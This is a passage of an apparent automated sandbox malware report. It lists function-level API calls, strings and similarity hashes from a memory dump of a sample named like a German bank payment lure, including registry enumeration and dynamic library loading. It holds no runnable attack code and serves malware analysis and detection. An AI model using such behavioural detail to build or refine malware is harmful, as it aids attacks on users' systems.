• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: _snwprintfwcscat
• String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
• API String ID: 384018552-4153097237
• Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
• Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
• Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
• Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ItemMenu$CountInfomemsetwcschr
• String ID: 0$6
• API String ID: 2029023288-3849865405
• Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
• Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
• Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
• Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
APIs
  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
• memset.MSVCRT ref: 00405455
• memset.MSVCRT ref: 0040546C
• memset.MSVCRT ref: 00405483
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$memcpy$ErrorLast
• String ID: 6$\
• API String ID: 404372293-1284684873
• Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
• Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
• Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
• Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
• GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
• GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
• wcscpy.MSVCRT ref: 0040A0D9
• wcscat.MSVCRT ref: 0040A0E6
• wcscat.MSVCRT ref: 0040A0F5
• wcscpy.MSVCRT ref: 0040A107
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Time$Formatwcscatwcscpy$DateFileSystem
• String ID:
• API String ID: 1331804452-0
• Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
• Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
• Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
• Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
APIs
  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404398
• GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
• GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
• GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
• GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                          • String ID: advapi32.dll
                                                                                                                                                                                                                                          • API String ID: 2012295524-4050573280
                                                                                                                                                                                                                                          • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                                                                          • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                                                          • <%s>, xrefs: 004100A6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                                                          • API String ID: 3473751417-2880344631
                                                                                                                                                                                                                                          • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                                                                                                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                                                          • API String ID: 2521778956-791839006
                                                                                                                                                                                                                                          • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                                                                                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _snwprintfwcscpy
                                                                                                                                                                                                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                                                                                                          • API String ID: 999028693-502967061
                                                                                                                                                                                                                                          • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                                                                                                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                                                                                                            • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408E46
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memsetstrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2350177629-0
                                                                                                                                                                                                                                          • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                                                                                                                                          • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset
• String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
• API String ID: 2221118986-1606337402
• Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
• Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
• Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
• Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
APIs
• _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
• memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
• memset.MSVCRT ref: 00408FD4
• memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
• memset.MSVCRT ref: 00409042
• memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
  • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcmpmemset$_mbscpymemcpystrlen
• String ID:
• API String ID: 265355444-0
• Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
• Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
• Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
• Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
APIs
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
• memset.MSVCRT ref: 0040C439
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
• _wcsupr.MSVCRT ref: 0040C481
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
• memset.MSVCRT ref: 0040C4D0
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
• String ID:
• API String ID: 4131475296-0
• Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
• Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
• Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
• Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
APIs
• memset.MSVCRT ref: 004116FF
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
• API String ID: 2618321458-3614832568
• Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
• Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
• Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
• Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
APIs
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: AttributesFilefreememset
• String ID:
• API String ID: 2507021081-0
• Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
• Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
• Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
• Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
APIs
• AreFileApisANSI.KERNEL32 ref: 004174FC
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
• malloc.MSVCRT ref: 00417524
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
• free.MSVCRT ref: 00417544
• free.MSVCRT ref: 00417562
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ByteCharMultiWidefree$ApisFilemalloc
• String ID:
                                                                                                                                                                                                                                          • API String ID: 4131324427-0
                                                                                                                                                                                                                                          • Opcode ID: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                                                                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                                                                                                          • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0041822B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PathTemp$free
                                                                                                                                                                                                                                          • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                                                          • API String ID: 924794160-1420421710
                                                                                                                                                                                                                                          • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                                                                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                                                                            • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                                          • API String ID: 1775345501-2769808009
                                                                                                                                                                                                                                          • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                                                                                                          • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
